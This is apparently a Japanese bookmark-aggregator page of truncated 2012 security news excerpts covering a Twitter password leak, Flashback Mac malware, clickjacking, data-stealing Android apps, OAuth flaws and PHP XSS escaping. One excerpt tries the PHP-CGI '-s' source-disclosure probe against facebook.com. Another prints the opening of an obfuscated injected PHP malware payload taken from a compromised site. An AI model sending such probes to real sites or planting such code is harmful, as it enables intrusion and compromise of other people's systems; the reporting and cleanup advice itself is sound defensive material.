Twitterは、膨大な数のアカウントパスワードおよび電子メールアドレスと思われるデータが流出した件について調査を行っている。 Twitterの広報担当者であるRobert Weeks氏は米CNETへの電子メールの中で、「われわれは現在、この状況を調査しているところだ。さしあたって、影響を受けた可能性のあるアカウントにパスワードのリセットを要請した。自分のアカウントが被害に遭ったかもしれないと心配している人々に対して、われわれはHelp Centerでパスワードのリセットなどの対策を推奨している」と述べた。 問題となっているユーザーデータ(容量が非常に大きいので公開にはPastebinで5ページを要した)は米国時間5月7日に公開され、Airdemon.netのブログで取り上げられた。同ブログは、影響を受けたアカウント数を5万5000件以上と試算している。盗まれたTwitterユーザー情報を
PHPに新たな脆弱性が見つかって、CGIモードで動作するPHPの場合コマンドライン引数がHTTP経由で渡せてしまうため、-sオプションを渡すとPHPのソースコードが丸見えになるというのが話題になってます。(-sオプションはhtmlでシンタックスハイライトまでしてくれてコードが見やすくなる) そこでFacebookに向けてこれを試してみると・・・ https://www.facebook.com/?-s こんな情報が!! <?php include_once 'https://www.facebook.com/careers/department?dept=engineering&req=a2KA0000000Lt8LMAS'; このURLにアクセスすると、セキュリティエンジニアの求人情報ページに行きます :) おしゃれー
コーヒーサーバは香炉である 美人プログラマごうだまりぽのブログですがデータが吹っ飛んでしまって仮復旧中。画像が入っていないところ、整形されていないところなどがあります。 検索 メインメニュー 最近、知らないうちにアダルトサイトなどをFacebookで「いいね」してしまうという問題が話題になっている。 知らない間にアダルトサイトを「いいね」 Facebook知人、同僚に性的嗜好がバレる (J-CASTニュース) これにはクリックジャッキングと呼ばれる手法が使われている。たとえば、ユーザが興味を引くような画像を表示してクリックを促し、実際にはその上にかぶせるように設置した「透明の『いいね』ボタン」を押させるというような仕組みだ。ページ内の要素の「透明度」を変えることでわりと簡単に仕掛けられる。 かんたんな絵であらわしてみた。図中のいいねボタンは半透明になっているけれど、実際に仕掛ける場合は透明
便利で楽しいFacebookアプリケーションが色々ある一方、中には怪しいものもあって、そういうところに個人情報を渡してしまうのは何かと危険。「自分でアプリを使っていないから大丈夫」というわけにもいかない。 友達が怪しいアプリに「私の友達の学歴とか近況とか住んでる場所とかチェックインした場所とか、全部取得してオッケーですよ☆」という許可を与えてしまったら、知らないところで自分の情報が取得されてしまう。これはFacebookの怖いところ。 友達がこんなアプリに許可を与えちゃったら超悲惨! 自分のせいで損をするのはいいけれど他人のせいで迷惑を被るのは困る。 実は「友達が利用しているアプリに、自分の情報をどこまで渡すか」というのを設定できる。目立たない項目だから、多分あまり知られていない。私も最近知ったよ。 Facebookにログインして、ヘッダのメニューから「ホーム > プライバシー設定」を
人気ゲームを動画で紹介するスマートフォンの複数のアプリが、利用者の電話帳に登録されていた名前やメールアドレス、電話番号などの個人情報を勝手に外部に送信していたことがセキュリティ会社の調査で分かりました。 このアプリは13日に削除されましたが、少なくとも6万人以上が利用していたとみられ、セキュリティ会社では、のべ数十万人から数百万人の個人情報が流出したおそれもあるとみています。 東京のセキュリティ会社「ネットエージェント」によりますと、問題のアプリはいずれもアンドロイドのスマートフォン向けに特定の作者が開発したもので、分かっているだけで16種類あります。 アプリの名前は、「連打の達人theMovie」「桃太郎電鉄theMovie」などまったく関係のない人気ゲームに「theMovie」などというタイトルをつけて、無料で配布されていました。 これらのアプリは、いずれもタイトルにある一般的な人気ゲ
2012/04/10 Webアプリケーションのセキュリティ改善に向けた啓発、研究活動を行う非営利団体、The Open Web Application Security Project(OWASP)の日本支部であるOWASP JAPANチャプターは3月27日、第1回のLocal Chapter Meetingを開催した。今後もこうしたセミナーを定期的に開催していく方針だ。 OWASPは、Webアプリケーションセキュリティの向上を目的とした団体だ。Webアプリケーションの脆弱性ワースト10を取りまとめた文書「OWASP Top 10」を定期的に公開するほか、安全なアプリケーション開発のためのガイドラインや脆弱性診断チュートリアル、診断トレーニング用の“やられWebアプリケーション”である「WebGoat」など、さまざまなリソースを提供している。 JAPANチャプターリーダーの1人、Benny
■ ローソンと付き合うには友達を捨てる覚悟が必要 当初3月末開始とされていた「LAWSON Wi-Fi」が、なぜか「当初の計画より事前テストに時間を要したため」として、遅れて4月6日から開始されたのだが、早速Twitterでこんな指摘が出ていた。 少なくともこういうのを「ログイン」と呼ぶのはやめて頂きたい。金融機関などでは、暗証番号に電話番号や誕生日を使うのをやめるよう利用者を啓発する活動にコストをかけてきたが、そうした労力を台無しにする。ローソンとしては、無料の無線LANを使わせるくらい、本人確認が甘くても自社の問題だから許されると思っているのだろうが、こういうやり方が社会に悪弊をもたらすことに気付いていないのか。 今回は、前回の日記で取り上げた「PASMOマイページ」の問題とは違って、「ログイン」で電話番号と誕生日を使用している。一般に、不正アクセス禁止法では、このような、IDと電話番
(Mac)Flashbackはあるか? 2012年03月23日21:52 ツイート fsecure_corporation クアラルンプール発 by:スレットソリューションチーム 月曜、Flashbackトロイの木馬によってMacに障害が起きない方法をご紹介した。今日はFlashback感染を見つける方法に関する情報を提供する。 以下のステップをより良く理解するには、Flashbackについても多少している方が良いだろう。これはOS Xマルウェアファミリで、Webブラウザにより表示されるコンテンツを修正する。そのために、同マルウェアはMacのブラウザが使用する機能を利用する。乗っ取られる機能は亜種ごとに異なるが、一般にCFReadStreamReadおよびCFWriteStreamWriteが含まれる: 標的とされるWebページと変更は、リモートサーバから読み出されるコンフィギュレーショ
パスコードなんて使ってても無駄... iPhoneを一瞬でアンロックして消したはずのメールや連絡先まで流出させるシステム登場!2012.04.05 12:00 湯木進悟 こんなのが市販されちゃったらもうお仕舞い... iPhoneユーザーの皆さま、4桁のパスコードで電話をロックするようにしてますか? あれさえやってれば、たとえうっかり電話を置き忘れたり落としてしまったりしても、勝手に拾った人にイジりまくられちゃうなんてことがないから大丈夫さ~ そんな安心感を抱いている人って少なくないと思うんですけど、スウェーデンのMicro Systemationが開発してしまった、恐るべき「XRY」システムにかかれば、パスコードで保護されているはずのiPhone 4が、わずか2分以内にアンロックされてしまい、消去したはずの通話ログからメール、連絡先のデータに至るまで、すべて丸裸に流出させられてしまいます
ロシアのセキュリティ企業によると、マルウェア「Flashback」は55万台以上のMacに感染し、強力なMacボットネットを形成しているという。 ロシアのウイルス対策ソフトメーカーDoctor Webは4月4日、Mac OS Xを狙ったマルウェア「Flashback」が55万台以上のマシンに感染し、強力なMacボットネットを形成していることが分かったと発表した。 Flashbackは新たな手口を実装した亜種が次々に出現し、Macに感染を広げているとしてセキュリティ各社が注意を促していた。Doctor Webによれば、中でも「Flashback.39」という亜種は、悪質なWebサイトにユーザーをリダイレクトしてJavaの脆弱性を突いた不正なアプレットを読み込ませる手口で感染を拡大。問題のコードを仕込んだWebサイトも大量に見つかっており、Google検索では3月末の時点で改ざんされたWebペ
Macに感染するマルウェア「Flashback」は感染先のマシンを制御するために、Twitterでハッシュタグを付けたツイートを使っているという。 Mac専門のウイルス対策ソフトメーカーIntegoは3月5日、Macに感染するマルウェア「Flashback」が感染先のマシンを制御するためにTwitterを利用していることが分かったとブログで伝えた。 同社によると、マルウェアの多くはサーバを使って感染先のコンピュータに命令を出しているが、このやり方ではIPアドレスを突き止められてサーバがダウンさせられる可能性があった。 これに対抗するためにFlashbackは、サーバではなくTwitterを利用しているという。しかも特定のアカウントでは削除される可能性があるため、ハッシュタグを付けたツイートを毎日生成。このツイートは、検出を免れるために無作為の文字列で構成されているという。 IntegoはF
はてなブックマークボタンを表示する 行動情報の取得について はてなブックマークボタンは、2011年9月1日より興味関心に基づく広告の掲載を目的とした行動情報の取得(個人情報以外)をしています。 この行動情報は株式会社マイクロアドのプラットフォームを利用し、Cookie を用いて取得されます。取得される情報は、ユーザーのみなさまが使用しているブラウザにおいて閲覧したページ履歴情報などで、これらはすべて匿名のものとして収集されます。個人が特定されうる情報(生年月日、メールアドレス、はてなIDなど)は一切収集されません。 Cookieと行動情報の取得は、広告配信の目的に限定しています。また、この取り組みは「一般社団法人 インターネット広告推進協議会(JIAA)」が定めるガイドラインに遵守しております。 匿名のブラウザ閲覧行動の取得・分析によって、ユーザーのみなさま1人1人が興味関心を持っているも
by Kristen Nicole Android搭載スマートフォンでリンクをクリックすると、攻撃者がフルリモートコントロール可能になってしまうというセキュリティの不具合があることが報告されました。実機を使ったデモンストレーションで実証されており、また、Android以外にiPhoneやiPad、BlackBerry、GoogleTVの端末も同様の危険に晒されている可能性があります。 How a Web Link Can Take Control of Your Phone - Technology Review サンフランシスコで開催されているRSA Conference 2012で、セキュリティ技術企業CrowdStrikeのジョージ・クルツさんらは、Android端末で誤ったリンクをクリックすると、攻撃者が端末をフルリモートコントロール可能になる不具合を発見しました。 「カメラがあっ
HTML5 Security CheatsheetはHTML5のセキュリティに関するチートシートです。問題点と対象Webブラウザ、対処法が一覧になっています。 HTML5 Security CheatsheetはHTML5におけるセキュリティホールになりえる問題点をコードを通じて広めていこうというプロジェクトです。Webプログラマ必見と言えるでしょう。 トップページです。様々な項目が並んでいます。 左側は各セキュリティチェックすべき項目で、対象になるWebブラウザとそのバージョンが並んでいます。問題点の提示とともに、その回避策についても書かれていますのでとても参考になります。 まだ日本語化されていない部分もあります。 ほぼ全てのWebブラウザが対象になる部分もあるようです。 項目は非常に多いですが、セキュリティを重視するためにもチェックしておくべきです。 HTML5ではありますがIE6など
こんにちはこんにちは!! Webプログラミングしてますか! よく「PHPはセキュリティがダメ」とか言われてるよね。 でもそれって、べつにPHPが悪いんじゃなくて、 たぶん、セキュリティとかが、まだよくわからない人が多いだけなんじゃないかな。 がんばって勉強しようと思っても、なんだか難しい理屈が並んでいたりするしね…。 なので今日は、セキュリティ対策について、 「これだけやっとけば、わりと安全になるよ」ってことを、初心者むけに、大雑把に書いてみます! 理屈がわからなくても、最初はコピペでも、 なにもやらないより、やったほうがきっとマシになる! 1. XSS対策 動的なものを表示するとき、全部エスケープすればokです! (NG) あなたの名前は <?= $name ?> ですね! ↓ (OK) あなたの名前は <?= htmlspecialchars($name, ENT_QUOTES) ?>
In some of the feedback I have gotten on the openID Connect spec, the statement is made that Connect is too complicated. That OAuth 2.0 is all you need to do authentication. Many point to Identity Pro… 英語読みたくないという人のために簡単に解説すると… OAuth 2.0 の implicit flow を使って「認証」をしようとすると、とっても大きな穴が開きます。 カット&ペーストアタックが可能だからです。 OAuth 認証?は、図1のような流れになります。 図1 OAuth 認証?の流れ 一見、問題なさそうに見えます。しかし、それはすべてのサイトが「良いサイト」ならばです。 Site_A
改ざんされてウィルス配布コード埋めこまれてから復旧までの作業や申請の手続きについてまとめていきます。 追記: 「改ざんされた場合そのものの対処方法」という意味で書かせて頂きました。phpMyAdmin の脆弱性についてではなく全般的な内容となっております。誤解を与える表現となってしまい申し訳御座いません。 今回埋めこまれた不正なコード 実際のコードは改行やスペースがなくなって一行のコードとなっておりますので非常に気づきにくいです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn
F-Secureによると、2011年4~12月に新たに出現したMac狙いのマルウェアの総数は58件。トロイの木馬ダウンローダ―がほぼ半数を占めた。 セキュリティ企業のF-Secureは、Macを狙ったマルウェアに関する2011年の動向をまとめ、1月16日のブログで紹介した。 同社によると、2011年4月から12月にかけて新たに出現したMac狙いのマルウェアの総数は58件だった。内訳はトロイの木馬ダウンローダ―が29件とほぼ半数を占め、次いでバックドアが15件、トロイの木馬と悪質プログラムが各7件となっている。 月ごとの推移をみると、4月から6月にかけて出現数が上昇した後、8月にいったん急減、10月に再びピークを迎えている。 Mac狙いのマルウェアについてはセキュリティ各社からの出現報告が相次いでおり、数年前に比べると確かに脅威はあるとF-Secureは解説する。ただ、その流通量はまだWin
あなたはパソコンに詳しいほうですか? ときに、他人には知られたくない、プライベートなウェブサイトを覗くこともありますよね。そのパソコンが共有のものなら、多くの方は「履歴」を消していることでしょう。 ですが、履歴を消去しただけで安心している方は要注意! あなたの秘密がバレてしまう『ブラウザのこわい話』をお教えいたします。 何を検索したかがバレバレ「オートコンプリート」 ●機能 「オートコンプリート」という機能をごぞんじですか? 携帯電話の予測変換機能をイメージしていただけると分かりやすいでしょう。 GoogleやYahoo!といった検索サイトの検索窓に文字を入力すると、文字の履歴が残ります。検索窓に同じ文字を入れれば、ご丁寧にも過去に入力した検索ワードがずら~っと出てしまうのです。 しかし、このことに気づきにくい理由があります。 「キーワード検索補助」という機能が同時に働いているからです。
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く